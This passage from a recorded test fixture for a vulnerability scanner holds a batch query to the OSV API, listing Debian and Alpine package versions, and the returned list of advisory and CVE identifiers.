"ecosystem": "Debian", "name": "mawk" }, "version": "1.3.3-17+b3" }, { "package": { "ecosystem": "Debian", "name": "mount" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "multiarch-support" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "ncurses-base" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "ncurses-bin" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "netbase" }, "version": "5.4" }, { "package": { "ecosystem": "Debian", "name": "openssl" }, "version": "1.1.0l-1~deb9u5" }, { "package": { "ecosystem": "Debian", "name": "passwd" }, "version": "1:4.4-4.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "perl" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "perl-base" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "perl-modules-5.24" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "pgdg-keyring" }, "version": "2018.2" }, { "package": { "ecosystem": "Debian", "name": "pinentry-curses" }, "version": "1.0.0-2" }, { "package": { "ecosystem": "Debian", "name": "postgresql-11" }, "version": "11.15-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-client-11" }, "version": "11.15-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-client-common" }, "version": "238.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-common" }, "version": "238.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "readline-common" }, "version": "7.0-3" }, { "package": { "ecosystem": "Debian", "name": "sed" }, "version": "4.4-1" }, { "package": { "ecosystem": "Debian", "name": "sensible-utils" }, "version": "0.0.9+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "ssl-cert" }, "version": "1.0.39" }, { "package": { "ecosystem": "Debian", "name": "sysvinit-utils" }, 
"version": "2.88dsf-59.9" }, { "package": { "ecosystem": "Debian", "name": "tar" }, "version": "1.29b-1.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "tzdata" }, "version": "2021a-0+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "ucf" }, "version": "3.0036" }, { "package": { "ecosystem": "Debian", "name": "util-linux" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "xz-utils" }, "version": "5.2.2-1.2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "zlib1g" }, "version": "1:1.2.8.dfsg-5+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "zstd" }, "version": "1.1.2-1+deb9u1" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - 
TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_file#01 url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 22298 body: | { "results": [ { "vulns": [ { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2011-3374", "modified": "2026-03-17T02:42:42.368242Z" }, { "id": "DEBIAN-CVE-2018-0501", "modified": "2025-11-19T02:04:24.786271Z" }, { "id": "DEBIAN-CVE-2019-3462", "modified": "2025-11-19T02:02:50.288367Z" }, { "id": "DEBIAN-CVE-2020-27350", "modified": "2025-11-19T01:06:21.507844Z" }, { "id": "DEBIAN-CVE-2020-3810", "modified": "2025-11-19T01:08:53.168851Z" }, { "id": "DSA-4685-1", "modified": "2026-03-09T02:09:03.263738Z" }, { "id": "DSA-4808-1", "modified": "2026-03-09T02:11:17.119108Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2019-18276", "modified": "2025-11-19T01:19:06.470662Z" }, { "id": "DEBIAN-CVE-2022-3715", "modified": "2026-03-17T02:47:45.184492Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2016-2781", "modified": "2026-03-17T02:44:35.752995Z" }, { "id": "DEBIAN-CVE-2017-18018", "modified": "2026-03-17T02:45:06.555217Z" }, { "id": 
"DEBIAN-CVE-2024-0684", "modified": "2025-11-19T01:02:00.374806Z" }, { "id": "DEBIAN-CVE-2025-5278", "modified": "2026-03-17T02:52:23.723753Z" } ] }, {}, {}, { "vulns": [ { "id": "DLA-3482-1", "modified": "2025-05-26T07:01:25.263124Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2022-1664", "modified": "2025-11-20T10:15:48.083782Z" }, { "id": "DEBIAN-CVE-2025-6297", "modified": "2026-03-17T02:50:41.230667Z" }, { "id": "DEBIAN-CVE-2026-2219", "modified": "2026-03-14T15:06:12.109941Z" }, { "id": "DLA-3022-1", "modified": "2026-03-09T01:23:37.553205Z" }, { "id": "DSA-5147-1", "modified": "2026-03-09T02:10:11.335992Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2019-5094", "modified": "2025-11-19T02:02:52.019166Z" }, { "id": "DEBIAN-CVE-2019-5188", "modified": "2025-11-19T01:01:51.904490Z" }, { "id": "DEBIAN-CVE-2022-1304", "modified": "2025-11-20T10:15:47.847878Z" }, { "id": "DLA-3910-1", "modified": "2026-03-09T01:22:32.343795Z" }, { "id": "DSA-4535-1", "modified": "2026-03-09T02:10:12.902574Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-9493-h29p-rfm2", "modified": "2026-02-04T03:47:55.536228Z" }, { "id": "GHSA-cgrx-mc8f-2prm", "modified": "2026-02-04T02:50:45.342760Z" }, { "id": "GHSA-f3fp-gc8g-vw66", "modified": "2026-02-04T04:15:59.735117Z" }, { "id": "GHSA-g2j6-57v7-gm8c", "modified": "2026-02-04T02:43:58.212471Z" }, { "id": "GHSA-jfvp-7x6p-h2pv", "modified": "2026-02-04T03:12:37.981869Z" }, { "id": "GHSA-m8cg-xc2p-r3fc", "modified": "2026-02-04T03:29:19.767788Z" }, { "id": "GHSA-qw9x-cqr3-wc7r", "modified": "2026-02-04T02:13:22.313241Z" }, { "id": "GHSA-v95c-p5hm-xq8f", "modified": "2026-03-13T22:16:11.684125Z" }, { "id": "GHSA-vpvm-3wq2-2wvm", "modified": "2026-02-04T02:53:37.613379Z" }, { "id": "GHSA-xr7r-f8xq-vfvv", "modified": "2026-02-04T03:18:48.377509Z" }, { "id": "GO-2022-0274", "modified": "2026-02-04T02:26:28.343240Z" }, { "id": "GO-2022-0452", "modified": "2026-02-04T03:17:02.340230Z" }, { "id": "GO-2023-1627", "modified": 
"2026-02-04T03:58:42.107712Z" }, { "id": "GO-2023-1682", "modified": "2026-02-04T02:59:23.815900Z" }, { "id": "GO-2023-1683", "modified": "2026-02-04T04:01:58.343687Z" }, { "id": "GO-2024-2491", "modified": "2026-02-04T02:39:00.262696Z" }, { "id": "GO-2024-3110", "modified": "2026-02-04T02:23:26.560077Z" }, { "id": "GO-2025-4096", "modified": "2026-02-04T03:11:33.546218Z" }, { "id": "GO-2025-4097", "modified": "2026-02-04T03:00:55.376695Z" }, { "id": "GO-2025-4098", "modified": "2026-02-04T02:52:46.004719Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-p782-xgp4-8hr8", "modified": "2026-02-04T04:15:14.486111Z" }, { "id": "GO-2022-0493", "modified": "2026-02-04T03:42:54.589715Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2022-1271", "modified": "2025-11-20T10:15:47.940295Z" }, { "id": "DSA-5122-1", "modified": "2026-03-09T02:09:10.163691Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-0379", "modified": "2025-11-19T01:06:25.120079Z" }, { "id": "DEBIAN-CVE-2017-7526", "modified": "2025-11-19T02:04:40.318681Z" }, { "id": "DEBIAN-CVE-2018-0495", "modified": "2025-11-19T02:04:27.207183Z" }, { "id": "DEBIAN-CVE-2018-6829", "modified": "2026-03-10T05:05:47.263837Z" }, { "id": "DEBIAN-CVE-2019-13627", "modified": "2025-11-19T01:12:35.581705Z" }, { "id": "DEBIAN-CVE-2021-33560", "modified": "2026-03-10T05:07:08.938163Z" }, { "id": "DEBIAN-CVE-2021-40528", "modified": "2025-11-19T01:01:59.995618Z" }, { "id": "DEBIAN-CVE-2024-2236", "modified": "2026-03-10T05:09:58.705229Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-10790", "modified": "2025-11-19T01:01:57.855157Z" }, { "id": "DEBIAN-CVE-2018-1000654", "modified": "2025-11-19T02:02:40.642360Z" }, { "id": "DEBIAN-CVE-2018-6003", "modified": 
"2025-11-19T01:06:22.990063Z" }, { "id": "DEBIAN-CVE-2021-46848", "modified": "2025-11-20T10:15:14.681077Z" }, { "id": "DEBIAN-CVE-2024-12133", "modified": "2025-11-20T10:17:02.620233Z" }, { "id": "DEBIAN-CVE-2025-13151", "modified": "2026-01-20T05:13:20.502324Z" }, { "id": "DLA-3263-1", "modified": "2026-03-09T01:22:34.273046Z" }, { "id": "DLA-4061-1", "modified": "2026-03-09T01:20:16.124977Z" }, { "id": "DSA-5863-1", "modified": "2026-03-09T02:08:50.747280Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2016-3709", "modified": "2025-11-20T10:12:11.931996Z" }, { "id": "DEBIAN-CVE-2016-9318", "modified": "2025-11-19T02:02:45.582059Z" }, { "id": "DEBIAN-CVE-2017-0663", "modified": "2025-11-19T02:02:52.056836Z" }, { "id": "DEBIAN-CVE-2017-15412", "modified": "2025-11-19T01:08:49.499099Z" }, { "id": "DEBIAN-CVE-2017-16931", "modified": "2025-11-19T02:04:25.542166Z" }, { "id": "DEBIAN-CVE-2017-16932", "modified": "2025-11-19T01:04:39.458229Z" }, { "id": "DEBIAN-CVE-2017-18258", "modified": "2025-11-19T01:08:48.927062Z" }, { "id": "DEBIAN-CVE-2017-5130", "modified": "2025-11-19T01:03:12.822124Z" }, { "id": "DEBIAN-CVE-2017-5969", "modified": "2025-11-19T01:08:52.062516Z" }, { "id": "DEBIAN-CVE-2017-7375", "modified": "2025-11-19T02:02:48.011785Z" }, { "id": "DEBIAN-CVE-2017-7376", "modified": "2025-11-19T02:01:17.016443Z" }, { "id": "DEBIAN-CVE-2017-8872", "modified": "2025-11-19T02:04:31.920669Z" }, { "id": "DEBIAN-CVE-2017-9047", "modified": "2025-11-19T02:04:30.335407Z" }, { "id": "DEBIAN-CVE-2017-9048", "modified": "2025-11-19T01:19:09.303210Z" }, { "id": "DEBIAN-CVE-2017-9049", "modified": "2025-11-19T01:03:12.259406Z" }, { "id": "DEBIAN-CVE-2017-9050", "modified": "2025-11-19T01:08:53.069573Z" }, { "id": "DEBIAN-CVE-2018-14404", "modified": "2025-11-19T01:12:32.274520Z" }, { "id": "DEBIAN-CVE-2018-14567", "modified": "2025-11-19T01:08:49.660035Z" }, { "id": "DEBIAN-CVE-2019-19956", "modified": "2025-11-19T02:01:17.970372Z" }, { "id": 
"DEBIAN-CVE-2019-20388", "modified": "2025-11-19T02:04:37.363509Z" }, { "id": "DEBIAN-CVE-2020-24977", "modified": "2025-11-19T02:04:41.266003Z" }, { "id": "DEBIAN-CVE-2020-7595", "modified": "2025-11-19T02:04:29.271836Z" }, { "id": "DEBIAN-CVE-2021-3516", "modified": "2025-11-19T02:01:14.946107Z" }, { "id": "DEBIAN-CVE-2021-3517", "modified": "2025-11-19T01:12:34.981900Z" }, { "id": "DEBIAN-CVE-2021-3518", "modified": "2025-11-19T01:19:08.645337Z" }, { "id": "DEBIAN-CVE-2021-3537", "modified": "2025-11-19T02:04:30.248276Z" }, { "id": "DEBIAN-CVE-2021-3541", "modified": "2025-11-19T02:04:36.614917Z" }, { "id": "DEBIAN-CVE-2022-2309", "modified": "2025-11-20T10:15:28.694644Z" }, { "id": "DEBIAN-CVE-2022-23308", "modified": "2025-11-20T10:15:29.029152Z" }, { "id": "DEBIAN-CVE-2022-29824", "modified": "2025-11-20T10:15:52.814213Z" }, { "id": "DEBIAN-CVE-2022-40303", "modified": "2025-11-20T10:16:01.982632Z" }, { "id": "DEBIAN-CVE-2022-40304", "modified": "2025-11-20T10:16:01.918054Z" }, { "id": "DEBIAN-CVE-2022-49043", "modified": "2025-11-20T10:16:12.358770Z" }, { "id": "DEBIAN-CVE-2023-28484", "modified": "2025-11-20T10:16:35.199991Z" }, { "id": "DEBIAN-CVE-2023-29469", "modified": "2025-11-20T10:17:34.943682Z" }, { "id": "DEBIAN-CVE-2023-39615", "modified": "2025-11-20T10:16:41.593841Z" }, { "id": "DEBIAN-CVE-2023-45322", "modified": "2025-11-20T10:16:44.891362Z" }, { "id": "DEBIAN-CVE-2024-25062", "modified": "2025-11-20T10:17:04.986212Z" }, { "id": "DEBIAN-CVE-2024-34459", "modified": "2025-11-20T10:17:41.570595Z" }, { "id": "DEBIAN-CVE-2024-56171", "modified": "2025-11-20T10:17:48.605695Z" }, { "id": "DEBIAN-CVE-2025-24928", "modified": "2025-11-20T10:18:05.778161Z" }, { "id": "DEBIAN-CVE-2025-27113", "modified": "2025-11-20T10:18:06.358243Z" }, { "id": "DEBIAN-CVE-2025-32414", "modified": "2025-11-20T10:18:08.076077Z" }, { "id": "DEBIAN-CVE-2025-32415", "modified": "2025-11-20T10:18:08.251077Z" }, { "id": "DEBIAN-CVE-2025-49794", "modified": 
"2025-11-20T10:18:23.322205Z" }, { "id": "DEBIAN-CVE-2025-49796", "modified": "2025-11-20T10:18:23.585429Z" }, { "id": "DEBIAN-CVE-2025-6021", "modified": "2025-11-20T10:18:26.314947Z" }, { "id": "DEBIAN-CVE-2025-6170", "modified": "2025-11-20T10:18:26.670728Z" }, { "id": "DEBIAN-CVE-2025-8732", "modified": "2025-12-14T10:13:26.467517Z" }, { "id": "DEBIAN-CVE-2025-9714", "modified": "2026-01-10T14:08:12.148171Z" }, { "id": "DEBIAN-CVE-2026-0989", "modified": "2026-01-16T11:05:07.928323Z" }, { "id": "DEBIAN-CVE-2026-0990", "modified": "2026-01-16T11:05:23.527352Z" }, { "id": "DEBIAN-CVE-2026-0992", "modified": "2026-01-16T11:05:10.515041Z" }, { "id": "DEBIAN-CVE-2026-1757", "modified": "2026-02-03T11:16:44.779248Z" }, { "id": "DLA-3012-1", "modified": "2026-03-09T01:20:46.878115Z" }, { "id": "DLA-3172-1", "modified": "2026-03-09T01:19:54.747665Z" }, { "id": "DLA-3405-1", "modified": "2026-03-09T01:01:29.748040Z" }, { "id": "DLA-3878-1", "modified": "2026-03-09T01:20:38.676387Z" }, { "id": "DLA-4064-1", "modified": "2026-03-09T01:20:30.558703Z" }, { "id": "DLA-4146-1", "modified": "2026-03-09T01:22:43.732573Z" }, { "id": "DLA-4251-1", "modified": "2026-03-09T02:11:12.986866Z" }, { "id": "DLA-4319-1", "modified": "2025-09-30T22:17:08.381361Z" }, { "id": "DSA-5142-1", "modified": "2026-03-09T02:10:58.737631Z" }, { "id": "DSA-5271-1", "modified": "2026-03-09T02:10:55.154283Z" }, { "id": "DSA-5391-1", "modified": "2026-03-09T02:09:39.164621Z" }, { "id": "DSA-5949-1", "modified": "2026-03-09T02:09:32.257423Z" }, { "id": "DSA-5990-1", "modified": "2025-08-29T13:01:48.117026Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2018-0732", "modified": "2025-11-19T02:02:54.249966Z" }, { "id": "DEBIAN-CVE-2018-0734", "modified": "2025-11-19T02:02:43.768735Z" }, { "id": "DEBIAN-CVE-2018-0735", "modified": "2025-11-19T01:19:04.251217Z" }, { "id": "DEBIAN-CVE-2018-5407", "modified": "2025-11-19T01:02:00.203143Z" }, { "id": "DEBIAN-CVE-2019-1543", 
"modified": "2025-11-19T01:12:34.981629Z" }, { "id": "DEBIAN-CVE-2019-1547", "modified": "2025-11-19T01:12:35.687253Z" }, { "id": "DEBIAN-CVE-2019-1549", "modified": "2025-11-19T01:04:40.924710Z" }, { "id": "DEBIAN-CVE-2019-1551", "modified": "2025-11-19T01:19:08.067279Z" }, { "id": "DEBIAN-CVE-2019-1563", "modified": "2025-11-19T02:04:34.392400Z" }, { "id": "DEBIAN-CVE-2020-1967", "modified": "2025-11-19T02:04:38.886020Z" }, { "id": "DEBIAN-CVE-2020-1971", "modified": "2025-11-19T02:04:28.520483Z" }, { "id": "DEBIAN-CVE-2021-23840", "modified": "2025-11-19T01:03:14.356310Z" }, { "id": "DEBIAN-CVE-2021-23841", "modified": "2025-11-19T02:02:54.160482Z" }, { "id": "DEBIAN-CVE-2021-3449", "modified": "2025-11-19T01:04:41.495834Z" }, { "id": "DEBIAN-CVE-2021-3450", "modified": "2025-11-19T02:01:16.123253Z" }, { "id": "DEBIAN-CVE-2021-3711", "modified": "2025-11-20T10:15:44.121033Z" }, { "id": "DEBIAN-CVE-2021-3712", "modified": "2025-11-20T10:15:44.130193Z" }, { "id": "DEBIAN-CVE-2021-4160", "modified": "2025-11-20T10:15:10.185497Z" }, { "id": "DEBIAN-CVE-2022-0778", "modified": "2025-11-20T10:15:47.332694Z" }, { "id": "DEBIAN-CVE-2022-1292", "modified": "2025-11-20T10:15:25.471825Z" }, { "id": "DEBIAN-CVE-2022-2068", "modified": "2025-11-20T10:15:27.022420Z" }, { "id": "DEBIAN-CVE-2022-2097", "modified": "2025-11-20T10:15:27.065089Z" }, { "id": "DEBIAN-CVE-2022-2274", "modified": "2025-11-19T02:02:45.418259Z" }, { "id": "DEBIAN-CVE-2022-3358", "modified": "2025-11-19T01:06:25.721124Z" }, { "id": "DEBIAN-CVE-2022-3602", "modified": "2025-11-19T01:12:35.687556Z" }, { "id": "DEBIAN-CVE-2022-3786", "modified": "2025-11-19T01:19:02.748977Z" }, { "id": "DEBIAN-CVE-2022-3996", "modified": "2025-11-19T02:01:16.596616Z" }, { "id": "DEBIAN-CVE-2022-4203", "modified": "2025-11-19T02:01:16.313531Z" }, { "id": "DEBIAN-CVE-2022-4304", "modified": "2025-11-20T10:16:04.313466Z" }, { "id": "DEBIAN-CVE-2022-4450", "modified": "2025-11-20T10:16:05.367442Z" }, { "id": 
"DEBIAN-CVE-2023-0215", "modified": "2025-11-20T10:16:27.838296Z" }, { "id": "DEBIAN-CVE-2023-0216", "modified": "2025-11-19T02:04:35.947667Z" }, { "id": "DEBIAN-CVE-2023-0217", "modified": "2025-11-19T01:12:37.272749Z" }, { "id": "DEBIAN-CVE-2023-0286", "modified": "2025-11-20T10:16:27.985311Z" }, { "id": "DEBIAN-CVE-2023-0401", "modified": "2025-11-19T01:12:36.298552Z" }, { "id": "DEBIAN-CVE-2023-0464", "modified": "2025-11-20T10:16:28.057931Z" }, { "id": "DEBIAN-CVE-2023-0465", "modified": "2025-11-20T10:16:28.143046Z" }, { "id": "DEBIAN-CVE-2023-0466", "modified": "2025-11-20T10:16:28.053837Z" }, { "id": "DEBIAN-CVE-2023-1255", "modified": "2025-11-19T01:08:49.387669Z" }, { "id": "DEBIAN-CVE-2023-2650", "modified": "2025-11-20T10:17:34.439123Z" }, { "id": "DEBIAN-CVE-2023-2975", "modified": "2025-11-20T10:16:36.112183Z" }, { "id": "DEBIAN-CVE-2023-3446", "modified": "2025-11-20T10:16:38.860251Z" }, { "id": "DEBIAN-CVE-2023-3817", "modified": "2025-11-20T10:17:35.737266Z" }, { "id": "DEBIAN-CVE-2023-5363", "modified": "2025-11-20T10:16:59.430619Z" }, { "id": "DEBIAN-CVE-2023-5678", "modified": "2025-11-20T10:17:38.719690Z" }, { "id": "DEBIAN-CVE-2023-6129", "modified": "2025-11-20T10:17:39.029757Z" }, { "id": "DEBIAN-CVE-2023-6237", "modified": "2025-11-20T10:17:39.218097Z" }, { "id": "DEBIAN-CVE-2024-0727", "modified": "2025-11-20T10:17:01.258658Z" }, { "id": "DEBIAN-CVE-2024-12797", "modified": "2025-11-19T02:04:36.131726Z" }, { "id": "DEBIAN-CVE-2024-13176", "modified": "2026-03-17T02:49:44.824285Z" }, { "id": "DEBIAN-CVE-2024-2511", "modified": "2025-11-20T10:17:05.139581Z" }, { "id": "DEBIAN-CVE-2024-4603", "modified": "2025-11-20T10:17:43.955114Z" }, { "id": "DEBIAN-CVE-2024-4741", "modified": "2025-11-20T10:17:26.990307Z" }, { "id": "DEBIAN-CVE-2024-5535", "modified": "2025-11-20T10:17:48.194687Z" }, { "id": "DEBIAN-CVE-2024-6119", "modified": "2025-11-20T10:17:53.824117Z" }, { "id": "DEBIAN-CVE-2024-9143", "modified": "2025-11-20T10:17:55.864918Z" }, { 
"id": "DEBIAN-CVE-2025-11187", "modified": "2026-03-17T02:47:10.761659Z" }, { "id": "DEBIAN-CVE-2025-15467", "modified": "2026-03-17T02:51:11.866899Z" }, { "id": "DEBIAN-CVE-2025-15468", "modified": "2026-03-17T02:51:12.304672Z" }, { "id": "DEBIAN-CVE-2025-15469", "modified": "2026-03-17T02:51:12.299847Z" }, { "id": "DEBIAN-CVE-2025-27587", "modified": "2026-03-17T02:51:34.552234Z" }, { "id": "DEBIAN-CVE-2025-4575", "modified": "2025-11-19T02:02:43.971243Z" }, { "id": "DEBIAN-CVE-2025-66199", "modified": "2026-03-17T02:52:26.091887Z" }, { "id": "DEBIAN-CVE-2025-68160", "modified": "2026-03-17T02:50:42.645267Z" }, { "id": "DEBIAN-CVE-2025-69418", "modified": "2026-03-17T02:51:22.404226Z" }, { "id": "DEBIAN-CVE-2025-69419", "modified": "2026-03-17T02:51:22.497785Z" }, { "id": "DEBIAN-CVE-2025-69420", "modified": "2026-03-17T02:51:22.651361Z" }, { "id": "DEBIAN-CVE-2025-69421", "modified": "2026-03-17T02:51:22.561721Z" }, { "id": "DEBIAN-CVE-2025-9230", "modified": "2026-03-17T02:51:39.764914Z" }, { "id": "DEBIAN-CVE-2025-9231", "modified": "2026-03-17T02:51:39.727656Z" }, { "id": "DEBIAN-CVE-2025-9232", "modified": "2026-03-17T02:51:39.882696Z" }, { "id": "DEBIAN-CVE-2026-22795", "modified": "2026-03-17T02:51:47.646020Z" }, { "id": "DEBIAN-CVE-2026-22796", "modified": "2026-03-17T02:51:47.743030Z" }, { "id": "DEBIAN-CVE-2026-2673", "modified": "2026-03-18T09:03:28.363302Z" }, { "id": "DLA-3008-1", "modified": "2026-03-09T01:23:33.375630Z" }, { "id": "DLA-3325-1", "modified": "2026-03-09T01:19:40.983935Z" }, { "id": "DLA-3449-1", "modified": "2026-03-09T01:22:47.322805Z" }, { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" }, { "id": "DLA-3942-1", "modified": "2026-03-09T01:22:40.686044Z" }, { "id": "DLA-3942-2", "modified": "2026-03-09T01:21:01.728730Z" }, { "id": "DLA-4176-1", "modified": "2026-03-09T01:20:23.459313Z" }, { "id": "DLA-4321-1", "modified": "2025-10-03T16:33:24.717173Z" }, { "id": "DLA-4490-1", "modified": "2026-02-23T10:30:28.927832Z" }, 
{ "id": "DSA-4539-1", "modified": "2026-03-09T02:09:20.276054Z" }, { "id": "DSA-4539-3", "modified": "2025-05-26T07:05:14.261652Z" }, { "id": "DSA-4661-1", "modified": "2026-03-09T02:08:53.792348Z" }, { "id": "DSA-4807-1", "modified": "2026-03-09T02:10:20.442914Z" }, { "id": "DSA-4855-1", "modified": "2026-03-09T02:11:29.405206Z" }, { "id": "DSA-4875-1", "modified": "2026-03-09T02:10:05.387501Z" }, { "id": "DSA-4963-1", "modified": "2026-03-09T02:10:15.488747Z" }, { "id": "DSA-5103-1", "modified": "2026-03-09T02:09:42.407559Z" }, { "id": "DSA-5139-1", "modified": "2026-03-09T02:09:17.334653Z" }, { "id": "DSA-5169-1", "modified": "2026-03-09T02:09:37.692763Z" }, { "id": "DSA-5343-1", "modified": "2026-03-09T02:09:47.149297Z" }, { "id": "DSA-5417-1", "modified": "2026-03-09T02:09:39.950679Z" }, { "id": "DSA-5532-1", "modified": "2026-03-09T02:08:31.395482Z" }, { "id": "DSA-5764-1", "modified": "2026-03-09T02:09:02.723874Z" }, { "id": "DSA-6015-1", "modified": "2025-10-01T13:32:01.848986Z" }, { "id": "DSA-6113-1", "modified": "2026-01-27T20:30:04.397078Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2011-4116", "modified": "2025-11-20T10:10:50.058601Z" }, { "id": "DEBIAN-CVE-2017-12837", "modified": "2025-11-19T01:03:14.361068Z" }, { "id": "DEBIAN-CVE-2017-12883", "modified": "2025-11-19T01:12:38.323688Z" }, { "id": "DEBIAN-CVE-2018-12015", "modified": "2025-11-19T02:02:49.033339Z" }, { "id": "DEBIAN-CVE-2018-18311", "modified": "2025-11-19T01:12:36.918544Z" }, { "id": "DEBIAN-CVE-2018-18312", "modified": "2025-11-19T02:04:33.584277Z" }, { "id": "DEBIAN-CVE-2018-18313", "modified": "2025-11-19T01:06:24.154928Z" }, { "id": "DEBIAN-CVE-2018-18314", "modified": "2025-11-19T01:12:35.416886Z" }, { "id": "DEBIAN-CVE-2018-6797", "modified": "2025-11-19T02:04:23.831823Z" }, { "id": "DEBIAN-CVE-2018-6798", "modified": "2025-11-19T02:02:49.628171Z" }, { "id": "DEBIAN-CVE-2018-6913", "modified": "2025-11-19T02:02:50.593437Z" }, { "id": "DEBIAN-CVE-2020-10543", "modified": 
"2025-11-19T01:04:39.904198Z" }, { "id": "DEBIAN-CVE-2020-10878", "modified": "2025-11-19T01:12:35.457057Z" }, { "id": "DEBIAN-CVE-2020-12723", "modified": "2025-11-19T02:02:47.094787Z" }, { "id": "DEBIAN-CVE-2020-16156", "modified": "2025-11-20T10:14:36.701112Z" }, { "id": "DEBIAN-CVE-2021-36770", "modified": "2025-11-20T10:15:44.080114Z" }, { "id": "DEBIAN-CVE-2022-48522", "modified": "2025-11-19T01:08:52.915564Z" }, { "id": "DEBIAN-CVE-2023-31484", "modified": "2025-11-20T10:17:35.627220Z" }, { "id": "DEBIAN-CVE-2023-31486", "modified": "2026-03-17T02:48:35.857896Z" }, { "id": "DEBIAN-CVE-2023-47038", "modified": "2025-11-20T10:16:46.343364Z" }, { "id": "DEBIAN-CVE-2024-56406", "modified": "2025-11-20T10:17:48.686371Z" }, { "id": "DEBIAN-CVE-2025-40909", "modified": "2025-11-20T10:18:21.143971Z" }, { "id": "DLA-3926-1", "modified": "2026-03-09T01:20:46.118633Z" }, { "id": "DSA-5902-1", "modified": "2026-03-09T02:09:19.793163Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3072-1", "modified": "2026-03-09T01:22:24.680239Z" }, { "id": "DLA-3189-1", "modified": "2025-05-26T07:01:07.887113Z" }, { "id": "DLA-3316-1", "modified": "2025-05-26T07:01:13.127412Z" }, { "id": "DLA-3422-1", "modified": "2026-03-09T01:20:56.692752Z" }, { "id": "DLA-3600-1", "modified": "2026-03-09T01:17:49.966197Z" }, { "id": "DLA-3651-1", "modified": "2026-03-09T01:18:05.310519Z" }, { "id": "DLA-3764-1", "modified": "2026-03-09T01:23:22.273526Z" }, { "id": "DSA-5135-1", "modified": "2026-03-09T02:11:21.646978Z" } ] }, {}, {}, {}, {}, {}, { "vulns": 